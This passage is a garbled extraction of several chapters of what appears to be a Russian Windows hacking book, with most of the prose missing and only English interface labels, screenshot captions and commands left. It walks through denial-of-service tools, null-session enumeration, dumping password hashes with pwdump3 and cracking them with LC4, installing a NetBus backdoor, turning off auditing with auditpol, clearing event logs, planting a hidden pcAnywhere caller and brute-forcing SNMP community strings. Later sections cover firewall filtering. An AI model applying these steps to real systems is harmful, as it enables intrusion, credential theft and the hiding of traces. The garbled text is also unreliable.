UDP, . , DoS, UDP Flooder 2.0
Foundstone (http://www.foundstone.com), , - , .
. 13.1 UDP Flooder 2.0.

Fig. 13.1. UDP



UDP Flooder 2.0,
DoS 1-3
IP- 1.0.0.5 .
> UDP Flooder 2.0.
> IP/hostname (IP/ ) IP- NetBIOS - IP- 1.0.0.5.
> Port () , 80, HTTP-.
> Speed () LAN, .
> Data ()
Random ( ), .
> , , 20 000 30 000, .
Go ().
> , , Stop
().
. 13.2 Alex-
, Networking ().


[Screenshot: Windows Task Manager, Networking tab. Adapter Sword, link speed 10 Mbps, with the Network Utilization graph; status bar shows 33 processes.]

Puc. 13.2. - 80%


, -
UDP, 50%
. - ,
LAN Ethernet lOBase.

ICMP
( ) ICMP (Internet Control Message Protocol -
) ICQ,
11 ( UDP).
. 13.3 X-Script ICMP Bomber.
[Screenshot: X-Script ICMP Bomber window with Host (1.0.0.5), Packet Size and Number To Send fields; the log repeats the line "Received 34464 bytes from 1.0.0.5 in 60 msecs".]

Puc. 13.3. X-Script ICMP Bomber ,


, Host
() IP- ,
Ping (). , Packet Size ( )
, Number to Send ( ) .
-
. . 13.4 ,
Alex- ( IP-
, , 1.0.0.5).

[Screenshot: Windows Task Manager, Networking tab. Adapter Sword, link speed 10 Mbps, with the Network Utilization graph; status bar shows 33 processes and CPU usage 52%.]

Puc. 13.4. DoS !


ICMP' , ICMP (Internet Control Message Protocol - ) TCP/IP, ICMP
. ICMP
,
Web-; ICMP .

Amaka Smurf
, , ,
DoS ? Smurf, .


, , Smurf
. ECHO () ICMP,
. IP- ,
. , , -
10 , .
, DoS, DDoS (Distributed DoS). DDoS -, .
, ,
DoS . DDoS WinTrinoo (
http://www.bindview.com), , , DDoS Win32. 2000 DDoS
, Web- (, , , WinTrinoo).
- Foundstone , ,
DoS.

Amaku
DoS, , , , , . , , DoS,

,
. , .
DoS
PortFuck, ( TCP- , ). PortFuck - TCP- , . ,
,


, TCP- ,
, , .
. 13.5 PortFuck.
[Screenshot: PortFuck 1.02 PRIVATE BUILD window with Host (localhost) and Port fields, "Disconnect on Connect" and "Reconnect on Disconnect" checkboxes, a Delay (MS) field, a Socks counter, and START, HALT, PANIC! and Help buttons.]

Puc. 13.5. PortFuck


PortFuck DoS, .
> Host () IP- (
1.0.0.5).
> Port () 80 - HTTP.
> Disconnect on Connect ( )
Reconnect on Disconnect ( ),
/ Alex- ( -
1.0.0.5).
> PANIC! () , , ..
.
> START () .
> , , HALT
().
. 13.6 PortFuck
Alex-, Windows XP Pentium- 400 .
, - 80-90% ,
, Windows Alex-
. ,
. 13.7 PortFuck
80 Alex-, Attacker 3.0
Foundstone (http://www.foundstone.com).

[Screenshot: Windows Task Manager, Performance tab, with CPU Usage and Page File Usage history graphs and the Totals, Commit Charge, Physical Memory and Kernel Memory counters; status bar shows 37 processes and CPU usage 84%.]

Pttc. 13.6. Alex-3 !


[Screenshot: Attacker 3.0 listening on interface 1.0.0.5. The log, started Feb 13 2003 10:28:13, shows a run of "TCP connect from 1.0.0.1" entries at 10:28:26 from various source ports to port 80.]

Puc. 13.7. Alex-3 - 80


, HTTP-, 1-3,
, . ...


Amaku HekoppekmHbiMU nakema/wu


, .. ,
, ..
. , .
, -
. .

Amaku Nuke
^ Nuke ,
DoS, , , -, .
- , . TCP/IP
ICMP, ICMP .
- -
, .. - ICMP, , ,
. ,
.
- - ,
, , ,
. LRC
Web-, , . Nuke -
IRC.
DoS Nuke , ,
Windows 2000/XP ,
Windows 9x.
Windows 2000/XP,
(, [4]). ,
Windows ,
, .
,

.
Nuke - , . ,
Windows Nuke'eM version 1.1, . 13.8.


[Screenshot: Windows Nuke'eM Version 1.1 window with an Address field and address list (1.0.0.4, 1.0.0.5, 1.0.0.7), a Text field ("Testing 1 2 3"), a Delay field, a "Close after execution" checkbox, the author's notice that the program was created by Sadikuz for test purposes only, and an Execute button.]

Pitc. 13.8.
Nuke , - 1-2, IP- 1.0.0.4
Windows 95. .
> Address () Windows Nuke'eM version 1.1,
. 13.8, IP- Alex-2 (Windows 95), Alex-3 (Windows XP) Alex-1 (Windows 2000).
IP- Add () .
> Execute (). Windows Nuke'eM version 1.1
(. 13.9).
[Screenshot: Windows Nuke'eM Version 1.1 window after execution. The address list marks one entry {Nuked} and two entries {Connect error}; the status line reads "Unable to connect to: 1.0.0.7".]

Puc. 13.9. Alex-2 !


> 1-2, 1-2 Windows.
Windows , . 13.10.

[Screenshot: Windows Explorer showing My Network Places with the computers Alex-2, Alex-3 and Sword-2000, and an error dialog: "\\Alex-2 is not accessible. The network path was not found."]

Puc. 13.10. , Alex-2 !


, 1-2 - Nuke. ,
- IP-.
Windows , , , IDS ( BlacklCE Defender).

Amaku Teardrop
, ,
Teardrop, Windows, Windows
NT 4 . Teardrop . , , ,
.
,
-
, . , , ( ), .
Windows /NT,
Windows 2000/XP.

Amaka Ping of Death


Ping of Death ( ) -
ICMP ( 1 -


),
ICMP, .. 64 .
, , ,
Windows , OS UNIX.

Amaku Land
Land , TCP- , - (, - ). TCP-
, , , , ..
TCP- . ,
IP- ,
. ,
, ,
TCP-.
, Land (, - Land), - Land
- Windows, Unix, MAC OS,
CISCO, 3COM.
Land, .

Amaku nakemaMu
- Nuke , - Nuke

. DoS
,
ICMP. .
- ICMP- Redirect (), , ,
.
17 .
- ICMP- Address
Mask Reply ( ),
, .


TCP- -
Nuke, , ICMP- Destination
Unreachable ( ), .
- ICMP- Source Quench ( ), . , ICMP- Destination Unreachable:
Datagram Too Big ( : ).
, ICMP DoS , , , , ,
,
.
, , DoS,
TCP/IP - NetBIOS Sir Dystic, nbname, NBNS IP-
NetBIOS Windows 2000 [4]. nbname, , NetBIOS NetBIOS. TCP/IP - , , , , net send.
, nbname
- , nbname, ,
nbname.

amak DoS
DoS - ,
. ,
, , . , [11] , , DoS, , , Web- . ,
Web-. ,
DoS.
DDoS - , , , , ,


-. , Foundstone.
,
, .. , 1 , Foundstone .
DDoS, , Foundstone .
Foundstone,
(Robin Keir), http://www.foundstone.com
DDoSPing 2.0, -. , UDP,
UDP .
. 13.11 DDosPing 2.0, .
[Screenshot: DDoSPing 2.00 window. Target IP address range with Start IP address and End IP address (both 1.0.0.5), Transmission speed control slider graded Modem > Cable > T1 > LAN, and the Infected Hosts list. The log shows the program started Sun Feb 16 13:50:48 2003, waited 6 seconds for final results and stopped at 13:50:54; counters: current IP 1.0.0.5, packets sent 3, zombies detected 0. Buttons: Stop, Save List, Configuration.]

. 13.11.
DDoS
DDoSPing 2.0 .
> Start IP address ( IP-) End IP-address (
IP-) IP- .


Speed () , , LAN.
, Configuration () (. 13.12).
, Windows defaults
(Windows ) Unix defaults (Unix ), Windows Unix, .
, DDoSPing 2.0 ,
WinTrinoo, ,
- StachelDraht Tribe Flood Network.
, (. 13.12).

[Screenshot: DDoSPing 2.00 Configuration dialog with "Windows defaults" and "UNIX defaults" buttons and three groups of per-agent settings, each with an Enable checkbox: UDP ports with a "Ping" command and expected reply, and two groups using Send ICMP ID and Receive ICMP ID values. General options: show UDP transmit errors, max run duration (secs), number of times to transmit each packet, and seconds to wait for final replies after the scan ends. Buttons: OK, Cancel.]

Puc. 13.12.
> DDoSPing 2.0 . . 13.11 Start ()
. Infected Hosts
( ).
, -
Zombie Zapper
(http://razor.bindview.com/tools/ZombieZapper_form.shtml),
WinTrinoo. . 13.13 , , , DDoSPing 2.O.


[Screenshot: Zombie Zapper window. Target(s) group with "Specify single IP or class C subnet" and a Target IP field; checkboxes for Trinoo, Trinoo for Windows, TFN, StachelDraht and Shaft (with a "my flooded host" field); UDP source port field; Repeats (1-300); Zap, About and Exit buttons.]

Puc. 13.13. Zombie Zapper


DDoSPing 2.0, Zombie Zapper , DDoSPing 2.O.

, , , DoS - , , 1 . , , - ,
, - Web- - .
- , , ,
, ,
. DoS
, -
(-, , )
Web-.
IP- ICMP-!
IDS IP-, , , ,
Web. , - , .
DoS , -
- !

5.

XakuHz TCP/IP
Windows 2000/XP
TCP/IP. 1 ,
. ,
,
, , , ,
.
, , -
.
, Windows 200/XP . TCP/IP ( 14),
( 15), ( 16),
( 17). 18
.

14.

Windows 2000/XP
, , - () ,
, - , ( , , [1]).
, , , -
-
. ,
.
?
TCP/IP,
. TCP/IP - .

.
1 ,

. - 12 Web-. , , ,
. 1, ,
- .

TCP/IP
IP- ,
ping
, W2RK (Windows 2000 Resource Pack).
IP-
ICMP (Internet Control Message Protocol - ). . . 14.1 ping Sword-2000.


C:\>ping 1.0.0.1
Pinging 1.0.0.1 with 32 bytes of data:
Reply from 1.0.0.1: bytes=32 time<1ms TTL=128
Reply from 1.0.0.1: bytes=32 time<1ms TTL=128
Reply from 1.0.0.1: bytes=32 time<1ms TTL=128
Reply from 1.0.0.1: bytes=32 time<1ms TTL=128

Ping statistics for 1.0.0.1:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

Puc. 14. L
ICMP Sword-2000 ping
. ICMP ,
, , hping (http://www.hping.org/).
(.. ) ICMP,
,
.

- ,
, [3].
SuperScan (http://www.foundstone.com),
(. . 14.2).
[Screenshot: SuperScan 3.0 window with the Hostname Lookup, IP range (Start, Stop, Ignore IP zero, Ignore IP 255, Extract from file), Timeout (Ping, Connect), Scan type (Resolve hostnames, Only scan responsive pings, Show host responses) and Scan (Ping only, Every port in list, All selected ports in list, All list ports from, All ports from) groups; the resolved host is SWORD-2000.]

. 14.2. SuperScan 3.0


. 14.2 IP-
1.0.0.1-1.0.0.7. ,
Sword-2000,
- TCP- 139 NetBIOS. ,
- .


,
, , . Windows NT/2000/XP -
NetBIOS 139.



Windows NT/2000, .
. Windows NT/2000/XP
.
net use \\1.0.0.1\IPC$ "" /user:""
1.0.0.1 - IP- Sword-2000, IPC$ -
Inter-Process Communication --
( ), ""
, /user:"" .
, , .
, SMB (Server Message
Block - ). ,
.
,
;
.
Alex- ( Windows XP)
Sword-2000 ( Windows 2000).
Sword-2000 Alex- - , Windows XP
Windows 2000,
, , .



Windows NT/2000/XP. net view nbtstat W2RK. net view .
C:\>net view /domain

SWORD
.
SWORD. , .
C:\>net view /domain:SWORD

\\ALEX-3
\\SWORD-2000
.
Sword-2000 .
nbtstat; . 14.3.
[Screenshot: Command Prompt output of nbtstat run against 1.0.0.1. Node IpAddress [1.0.0.5]; the NetBIOS Remote Machine Name Table lists SWORD-2000, SWORD, MSBROWSE, INet~Services, IS~SWORD-2000 and ADMINISTRATOR entries, all with status Registered.]

Puc. 14.3. nbtstat


Alex-3
. 14.3 ,
NetBIOS, NetBIOS. ,
<00> , <00>
- . <03> , ,
<03> - , Administrator. MSBROWSE, <1>
SWORD.


, , - Administrator. Sword-2000 ? net view,


. . 14.4.
[Screenshot: Command Prompt output of nbtstat -A 1.0.0.1. Node IpAddress [1.0.0.5]; the NetBIOS Remote Machine Name Table lists SWORD-2000, SWORD, MSBROWSE, INet~Services, IS~SWORD-2000 and ADMINISTRATOR entries, each of type UNIQUE or GROUP with status Registered, followed by the MAC address.]

. 14.4. Sword-2000
, Administrator
Sword-2000 CD-ROM. , *
NetBIOS, Administrator,
7, 9, 13, 17, 139, 443, 1025, 1027 , :.
Administrator - : .
, pwdump3.exe Windows NT/2000/XP LC4
.
, NetBIOS /
( Windows 2000/XP )? , , SNMP (Simple
Network Management Protocol - ), Windows NT/2000/XP. 15 .
, , ,
.


Windows NT/2000/XP .
, .


,
, , .
- , ..


, . nbtstat MIB,
- , (. [3] [4]). ,
, . ,
.
D:\>net use \\1.0.0.1\IPC$ * /u:Administrator
* ,
IPC$ Administrator.
:
Type password for \\1.0.0.1\IPC$:
. ,
- , , ,
. , , , SMBGrind, CyberCop Scanner Network Associates. (
[3]).
- .
, ,
, . Windows NT/2000/XP , SAM (Security Account Manager ). SAM (, , ) ,
, , . , - , , , , .
,
SAM, LC4 ( LOphtcrack,


- LC4) (http://www.atstake.com/research/redirect.html),
.
Samdump - SAM.
Pwdump - , . Syskey SAM ( Syskey . 4).
Pwdump2 - , Syskey.
.
PwdumpS - , Pwdump2, .
Syskey, 4; ,
SAM,
Windows 2000/XP , Windows NT
.
4 , , , .
Sword-2000 Pwdimp3, :
C:\>pwdump3 sword-2000 > password.psw
Sword-2000,
password.psw.

(Notepad) (. 14.5).
[Screenshot: password.psw opened in Notepad, showing one pwdump3 output line per account on Sword-2000 (user name, RID, LM hash and NTLM hash); accounts without a stored hash are marked NO PASSWORD.]

Puc. 14.5.
Sword-2000
, password.psw Administrator,
. , LC4, , -


,
Sword-2000 (. 14.6).
[Screenshot: @stake LC4 window listing the imported accounts (Administrator, Guest, krbtgt, Alex, Alex-1, TsInternetUser, the IUSR and IWAM accounts and the computer accounts) with LM Password and NTLM Password columns; several accounts show the recovered password 007 and the rest are marked "* missing *". The status line shows the dictionary words-english.dic.]

Puc. 14.6. ,
Sword-2000
Celeron 1000 , 007
. ,
LC4.
, , -
NetBIOS - , , .
, .

amaku
, - ,
, . -
, .
- ,
. , .
.

Invisible Key Logger Stealth (IKS) (http://www.amecisco.com/iksnt.htm),


6 . IKS -
,
.


- , ..,
, NetBus (http://www.netbus.org)
2 (Back Orifice 2000) (http://www.bo2k.com),
.
NetBus 2 - [3].
,
. ,
, , . - ,
, -
, ,
.
,
NetBus, cDc (Cult of the Dead
Cow - ).

NetBus
NetBus - , ..
, , , ,
, . ,
, . - ,
. , ,
- , . NetBus
: - Sword-2000
(IP- 1.0.0.1), - Alex-3 (IP- 1.0.0.5).
NetBus , NBSvr
( - fe NB Server fOffl |
). NBSvr , . 14.7.
NetBus NBSvr . .
> NB Server ( NB)
Settings (). 'Settings ' Close
Server Setup ( ), L
. 14.8.
. 14.7.
NetBus


Accept connections
( ).
Password ()
NetBus.
Visibility of
server ( )
Full visible ( ), NetBus
( ).
Access mode ( ) Full access ( ), Sword-2000

[Screenshot: NetBus Server setup dialog with the fields Run on port, Password, Visibility of server (Fully visible) and Access mode (Full access), the checkboxes "Autostart every Windows session" and "Log communication", and OK and Cancel buttons.]

Puc. 14.8.
NetBus

> Autostart every Windows session ( Windows),


.
> . .
- NetBus.exe.
> NetBus.exe, NetBus 2.0 Pro,
. 14.9.
[Screenshot: NetBus 2.0 Pro main window with File, Host, Control and Help menus and a host list with Destination and Host columns.]

Puc. 14.9. NetBus


Host * Neighborhood * Local (
* ). Network (),
. 14.10.


> Microsoft Windows (Microsoft Windows Network)


(. 14.11).
[Screenshots: NetBus Network dialog and Network neighbourhood dialog (Microsoft Windows Network), each with Add... and Close buttons.]

. 14.11.

Puc. 14.10.
NetBus

NetBus,
Sword-2000, Add (). Add Host ( ), . 14.12.

[Screenshot: NetBus Add Host dialog with the fields Destination (SWORD-2000), Host name/IP (1.0.0.1), TCP-port, User name (Administrator) and Password, and OK and Cancel buttons.]

Puc. 14.12. - NetBus


Host name/IP ( /IP) IP-
1.0.0.1.
User name ( ) Administrator, Password () -
LC4 007.
. Network ().
Network (), Close ().
NetBus 2.0 Pro
(. 14,13).


[Screenshot: NetBus 2.0 Pro main window listing the destinations SWORD-2000 and My computer; the status line reads "Cannot connect to 127.0.0.1".]

Puc. 14.13. NetBus 2.0 Pro


NetBus
> Sword-2000,
Sword-2000 Connect ().
NetBus 2.0 Pro Connected to 1.0.0.1 (v.2.0)
( 1.0.0.1 (v.2.0)).
NetBus , NetBus,
. ,
Administrator. . 14.14 NetBus, Control ().

[Screenshot: NetBus Control menu with the items Message manager, File manager, Window manager, Registry manager, Sound system, Plugin manager, Port redirect, Application redirect, Remote control, File actions, Spy functions and Exit Windows.]

Puc. 14.14. Memo Control



, Spy functions
( ) , , , , . ,
, ,
, .
! Sword-2000,
Windows,
.
, NetBus,
IKS,
. IIS (. 13), *
. ( ).

Cokpbimue
, ,
, -
, .
, / .
, . ,
, auditpol.exe W2RK. ( ) ,
.
.
C:\Auditpol>auditpol \\sword-2000 /disable
:
Running ...
Audit information changed successfully on \\sword-2000 ...
New audit policy on \\sword-2000 ...
(0) Audit Disabled
System                    = No
Logon                     = No
Object Access             = No
Privilege Use             = No
Process Tracking          = Success and Failure
Policy Change             = No
Account Management        = No
Directory Service Access  = No
Account Logon             = No

\\sword-2000 - , /disable
. auditpol.exe -
, ,
, , .
, auditpol /?,
. ,
/ SAM,
pwdump3.exe
SAM.

Windows 2000/XP,
( , ).
.
> (Start)
* (Settings * Control Panel).
>
(Administrative Tools).
> (Computer Management). .
> (System Tools * Event Viewer).
> (Security Log);
.
> (Clear all
Events). (Event Viewer)
.
> (No), . .
. , -
! , -
. ,
.


[3] elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm).


Windows NT 4, Windows 2000.
.
C:\els004>elsave -s \\sword-2000 -
-s , -
. , . ( elsave /? ,
). , - elsave.exe
,
(Computer Management).
? ( ) W2RK, SAM,
. . .

.

- .
, , ,
. Windows
( , , , [7]). Windows, IDS.

, IDS, , IP-
(, BlacklCE Defender). , ,
, -
.

15.

XakuHg cpegcmB
. , , , ,
, .
- ,
. ,
.
, ,
. ,
: , . - ,
,
.
. ,
.
( ,
18). ,

-
, 18 PhoneSweep , .

pcAnywhere 10.5.
,
SNMP (Simple Network Management Protocol - ), Windows. SNMP Windows , , - SOLARWINDS
(http://www.solarwinds.net).


pcAnywhere
pcAnywhere (http://www.symantec.com/pcanywhere)
Symantec TCP/IP. , pcAnywhere,
.

pcAnywhere
pcAnywhere ,
, , . , pcAnywhere,
, .
pcAnywhere , -
, .
pcAnywhere
pcAnywhere.
, - pcAnywhere
pcAnywhere,
(. 15.1).
[Screenshot: pcAnywhere remote session window showing the remote desktop with a folder tree: Desktop, My Documents, Local Disk (C:), Control Panel, My Network Places, Entire Network, Microsoft Windows Network, shares on Sword-2000, and Norton Protected Recycle Bin.]

. 15.1. pcAnywhere Alex-3


pcAnywhere , , pcAnywhere Manager (
pcAnywhere), . 15.2.

[Screenshot: pcAnywhere Manager window, Hosts view, with the items Add Host, DIRECT, MODEM and NETWORK, CABLE, DSL.]

Puc. 15.2. pcAnywhere


pcAnywhere, .
> Hosts () (. . 15.2).
> Add Host ( ).
pcAnywhere Host Properties: New Host ( pcAnywhere:
), . 15.3.
[Screenshot: "pcAnywhere Host Properties: New Host" dialog, Connection Info tab (other tabs: Settings, Callers, Security Options, Conference, Protect Item). The text reads "Choose up to two devices for this connection item by checking the boxes to the left of the device names. To customize a device, click the device name and then click Details." The device list includes SPX, NetBIOS, TCP/IP and ISDN via CAPI 2.0. Buttons: OK, Help.]

Puc. 15.3.
Connection info ( ) Device list ( ) ,
. TCP/IP, TCP/IP.


> TCP/IP
.
> Callers ().
, . 15.4.
[Screenshot: "pcAnywhere Host Properties: New Host" dialog, Callers tab, with the Authentication type list and an empty Caller list; buttons OK, Cancel and Help.]

Puc. 15.4. pcAnywhere


Callers () ,
pcAnywhere, .
> Authentication type ( )
;
pcAnywhere.
> Caller list ( ) ,
. New item ( ), . pcAnywhere Caller Properties:
New Caller ( pcAnywhere: ),
. 15.5.

pcAnywhere, , , Login Name
( ), Password () Confirm Password ( ).
pcAnywhere Caller Properties: New Caller
( pcAnywhere: ) , ( Callback), ( Privileges)
( Protect item).

[Screenshot: "pcAnywhere Caller Properties: New Caller" dialog, Identification tab (other tabs: Callback, Privileges, Protect Item), with the fields Login Name, Password and Confirm Password; buttons Cancel, Apply and Help.]

Puc. 15.5. pcAnywhere


>

pcAnywhere Caller Properties: New Caller (


pcAnywhere: ) , . Caller list (
) (. 15.6).
[Screenshot: "pcAnywhere Host Properties: New Host" dialog, Callers tab, with Authentication type set to pcAnywhere and the Caller list now containing the caller Alex-3; buttons OK, Cancel and Help.]

Puc. 15.6. pcAnywhere !



.
> , ,
(. 15.6).


> pcAnywhere Caller


Properties: New Caller ( pcAnywhere: ).
pcAnywhere (. 15.7).
[Screenshot: pcAnywhere Manager window, Hosts view, with the items Add Host, DIRECT, MODEM, NETWORK, CABLE, DSL and the new host item Sword-2000.]

Puc. 15.7. Sword-2000e


pcAnywhere
> pcAnywhere,
Launch
Host ( ). . - .
pcAnywhere.
pcAnywhere, pcAnywhere, pcAnywhere .
> pcAnywhere Remotes ().
pcAnywhere Manager ( pcAnywhere), (. 15.8).
[Screenshot: pcAnywhere Manager window, Remotes view, with the items Add Remote, DIRECT, File Transfer, MODEM, NETWORK, CABLE, DSL and Remote Control.]

Puc. 15.8. pcAnywhere


pcAnywhere


Add Remote ( ),
. .
> , NETWORK, CABLE, DSL (, , DSL). pcAnywhere Waiting ( pcAnywhere), . 15.9.
[Screenshot: "pcAnywhere Waiting..." dialog. The TCP/IP Hosts list contains SWORD-2000 (1.0.0.1); the status line reads "Waiting for selection...".]

Puc. 15.9. pcAnywhere



i
pcAnywhere Waiting ( pcAnywhere)
pcAnywhere, pcAnywhere.
TCP/IP Hosts ( TCP/IP), Sword-2000
.
> SWORD-2000.
NETWORK, CABLE, DSL - pcAnywhere (, , DSL pcAnywhere), . 15.10.
[Screenshot: "NETWORK, CABLE, DSL - pcAnywhere" window with the pcAnywhere Host Login dialog: "Please enter your login information:" and a User name field.]

Puc. 15.10. pcAnywhere



pcAnywhere Host Login ( pcAnywhere)


, AIex-
Sword-2000, . , . 15.1.
pcAnywhere
Sword-2000 , Privileges ()
Alex- (. . 15.11).
[Screenshot: pcAnywhere caller properties, Privileges tab (other tabs: Identification, Callback, Protect Item). Options: "Superuser - caller has full access rights to host machine" or "Specify individual caller rights" (allow caller to blank screen, upload files, cancel host, download files, restart host, use Ctrl+Break); Time limits (limit time allowed per session, caller subject to inactivity timeout); Set Drive Access; Command to execute after connect; Help button.]

Puc. 15.11. pcAnywhere



Privileges () Superuser
(), Alex- Sword-2000. , - /,
pcAnywhere. , .

pcAnywhere
-, , 10.5.1 pcAnywhere
, (., , [3]).
Revelation ***********
pcAnywhere Host Login ( pcAnywhere). , pcAnywhere
, (. 15.11).
, , , pcAnywhere - ,
.


, , /, Administrator/password,
( [3], , ). Brutus,
Web- 10 12. , , , . - , -
, .
, ? . , pcAnywhere -
. ,
, pcAnywhere, , (. 15.9).
, . , Superuser () Privileges
() (. 15.11).
. , pcAnywhere
_:/01 and Settings/All Users.WINNT/Application
Data/Symantec/pcAnywhere ( ,
pcAnywhere),
. Sword-2000
pcAnywhere Alex-
PCA.Alex-3.CIF - .. ,
, .CIF.
, , ,
pcAnywhere. pcAnywhere ,
, Hacker, PCA.Hacker.CIF
. PCA.Hacker.CIF - Sword-2000 _:/01 and Settings/All
Users.WINNT/Application Data/Symantec/ pcAnywhere,
Sword-2000 (. . 15.12).
pcAnywhere , Hacker, - ,
-.


[Screenshot: "pcAnywhere Host Properties: Sword-2000" dialog, Callers tab, with Authentication type set to pcAnywhere and the Caller list containing Alex-3 and Hacker.]

Puc. 15.12. !
? ,
- NetBIOS,
9 - , , , TFTP.
- (
). pcAnywhere Web-, IIS, 12 IIS 5, ,
. , , ,

pcAnywhere - .
, pcAnywhere
?
, ,
14. Windows - , Windows NT/2000/XP, SNMP (Simple Network Management Protocol ).


SNMP
SNMP . SNMP
, - , SNMP . SNMP,
SOLARWINDS (http://www.solarwinds.net). ; , - . SOLARWINDS - , , .
SNMP
, NetBIOS TCP/IP
- Windows 2000/XP . Windows NT/2000/XP , SNMP, .

npomokoA SNMP
SNMP TCP/IP ( IPX). SNMP
- ,
- , , .
SNMP
SNMP ( SNMP) SNMP, .. SNMP, , MIB (Management Information Base - ). MD3
, ,
, , , . SNMP, , snmputil W2RK , IP
Network Browser, SOLARWINDS 2002 Engineer's Edition (
http://www.solarwind.net 30- ).
, SNMP,
SNMP, . SNMP -


SNMP ,
, SNMP. UDP, IP, SNMP
Windows 161 162.

SOLARWINDS
SNMP, . SOLARWINDS,
.
. 15.13 MIB SolarWinds 2001
Engineer's Edition, MIB 1-3,
.

[Screenshot: SolarWinds MIB Browser querying 1.0.0.5 with the community string public. The MIB tree is expanded along iso (1), org (3), dod (6), internet (1), with the branches directory (1), mgmt (2), experimental (3) and private (4). The results pane (columns OID Name and Raw Value) lists svUserName entries (Guest, NewUser, IUSR_ALEX-3, IWAM_ALEX-3, Administrator, HelpAssistant and a SUPPORT_ account), svShareNumber 5, and svShareName entries (test, stake).]

Puc. 15.13. MIB Alex-3


. 15.13 , , , SAM LC4 (. 14).
, , SAM,
, .
, IP
Network Browser, (. . 15.14).


[Screenshot: IP Network Browser window for 1.0.0.1, identified as a Windows NT Domain Controller, with community string public. The node tree contains System MIB, Interfaces, Shared printers, Services, Accounts, Shares, Hub ports, TCP/IP Networks, IPX Network, ARP Table, Routes, UDP Services and TCP Connections; the status line reads "Subnet Scan Completed".]

Puc. 15.14. 1 IP Network Browser


MIB
,
. ,
SOLARWINDS 2001 Engineer's Edition SNMP
Brute Force Attack SNMP Dictionary Attack MIB , , ,
.
.
[3] SNMP ,
, public,
private, . - [3], ,
. SNMP
Brute Force Attack SNMP Dictionary Attack
SNMP . SNMP public private

. public"!, public2 , public. -
.
, SNMP Brute Force Attack, SNMP
.
> SNMP Brute Force Attack.
SNMP Brute Force Attack ( SNMP ) (. 15.15).


[Screenshot: SNMP Brute Force Attack window with File, Edit, Export and Help menus, Print, Settings and Help toolbar buttons, a "Target Hostname or IP Address" field, an Attack Speed slider (Fast) and an Attack button.]

. 15.15. SNMP
> Settings (). SNMP
Brute Force Attack References ( SNMP ),
. 15.16.
[Screenshot: SNMP Brute Force Attack Preferences dialog, General tab (other tabs: Character Set, Community Strings, SNMP), with the options "Stop searching after Read/Only string is found" and "Try community strings up to 6 characters long"; buttons OK, Cancel and Help.]

Puc. 15.16.
>

Try community
string up to 6 character long (
6 ).

, ; , ,
. ( - ,
,
- . , , ?) , -
SNMP, - public, private - !


> , , Try community string up to 6


character long ( 6
) 7 , .
>

Community string ( ); . 15.17.


;

[Screenshot: SNMP Brute Force Attack Preferences dialog, Community Strings tab, with the field Starting Community String ("Leave this blank to search all possible community strings") and the options "Rotate from right to left" (example: AAAB, AAAC, AAAD, AAAE) and "Rotate from left to right" (example: AAAA, DAAA, EAAA, FAAA); Help button.]

Puc. 15.17. SNMP


Starting Community String ( ) publics - 7- .
.
SNMP Brute Force Attack ( SNMP )
Attack ().
- Current Community String
( )
. , . 15.18.
SNMP Brute Force Attack
SNMP Attack complete.
A Read/Only Community string of "public!" was
discovered.
OK

Puc. 15.18. SNMP - publid!


, ...
SNMP, 161 162, SNMP, TCP/IP, (Services)
Windows 2000/XP, SNMP.
SNMP
,
SNMP.


, ( pcAnywhere), (
SNMP) ,

( ). , [3].
pcAnywhere , , -, ,
.
, SNMP,
SNMP . IP
Network Browser, , pcAnywhere,

pcAnywhere.
SNMP .
SNMP, Windows,
SNMP.
.
, , ,
- pcAnywhere
,
. ,
pcAnywhere ,
, .
Windows - .


16.

XakuH2
- ,
, , - . - , .
14 , - , , ,
, , , ,
. - ,
, . , ( ), -
, ...
, . , , ,
. , .
, , ,
? - . , ,
, . ,
... ,
, . -
. .

makoe
- ,
, , , .
,
.


,
. ,
ACL (Access Control List -
). ACL
, , , , ,
.
, .

, . , .
IP-
, (
NAT - Network Address Translation). IP- , , , ,
.
, .
- .
, , , , ..
, . (., , [2, 12]),
80%
.

. ,
,
.



, .

, ,
, .
.
,
.
.
. IP- . IP.
. ,
, , IP-
, , , ,
ACL.
( ), , , . -, ,
. ,
-,
, - , . -,
.
,
. , , ,
. ,
, , , Telnet, DNS, FTP, SNMP
. -
, , , , Telnet ( ), .
. - , .


Hacmpouka nakemoB

, . , , ,
, .
, .
,
. ,
, TCP/IP UDP. , , ACL . .
ACL , , .
, , .
ACL , , , .
, :
,
(, );
;

,
, ,
25 SMTP (Simple Mail Transfer Protocol ).
, - ACL,
.
.
, ,
Mailer , Spammer.


(. 16.1),
.
16.1.

1.

(. 16.2).
16.2.

1.

Spammer

16.2 , , - . ,
- - Spammer, -
- . : , . , . (*) , ; , Spammer, Spammer
.
,
(. 16.3).
16.3. ,

1.

Spammer

2.

*'

Mailer

25


2 , SMTP- 25 Mailer.
- ! 2
. 16.3 ( Spammer) - , , ,
.
, , , .
, .
. , WinRoute Pro
.
> WinRoute Pro,
WinRoute Pro WinRoute Administration (Start
Programs WinRoute Pro WinRoute Administration).
Kerio WinRoute Administrator (localhost), . 16.1.

. 16.1. WinRoute
> , Action * Connect ( *
). Open Configuration (
), . 16.2.

[Screenshot: WinRoute Open Configuration dialog: "Enter a hostname or an IP address of a computer running WinRoute:" with the fields WinRoute Host (localhost), Username (Admin) and Password; buttons OK and Cancel.]

. 16.2. WinRoute
, , ; .
WinRoute Settings *
Advanced * Packet Filter ( * ). Packet Filter ( ), . 16.3.
[Screenshot: WinRoute Packet Filter dialog with Incoming and Outgoing tabs, an interface list (Realtek RTL8029(AS) PCI Ethernet Adapter, Any interface), and the buttons Add, Edit..., Remove, OK, Cancel and Apply.]

Puc. 16.3.
Incoming () , Outgoing () - . .
> , Any Interface ( ), Add ().
Add Item ( ), . 16.4.


[Screenshot: WinRoute Add Item dialog. Packet Description group with Protocol, Source (Type: Any address) and Destination (Type: Any address); Action (Permit, Drop, Deny); Log Packet (Log into file, Log into window); Valid at (Time interval: Always); buttons OK and Cancel.]

Puc. 16.4.
> , Protocol ()
, .
Add Item ( ) , .
> - Packet
Filter ( ) (. 16.3) .

nakemoB

, ,
.
IP- (-),
.
IP-
IP-, . ,
IP- IP- . , IP-
.
, , . -,
, , .


, ,
.
,
,
. , , .
,
.
, ; - SYN. -
- , SYN,
- ,

.
,
, . ,
, , .
, , , .
, .

nocpegtmku
,
, .
,
-.
,
. .

-,
, ,
. , , . , - FTP


FTP , -
FTP-.
-
, , -
.

, . ,
, .
Deerfield Wingate Pro
(http://www.wingate.com). - . , , , .

kanaAbHbie

.
-
, .
,
, .
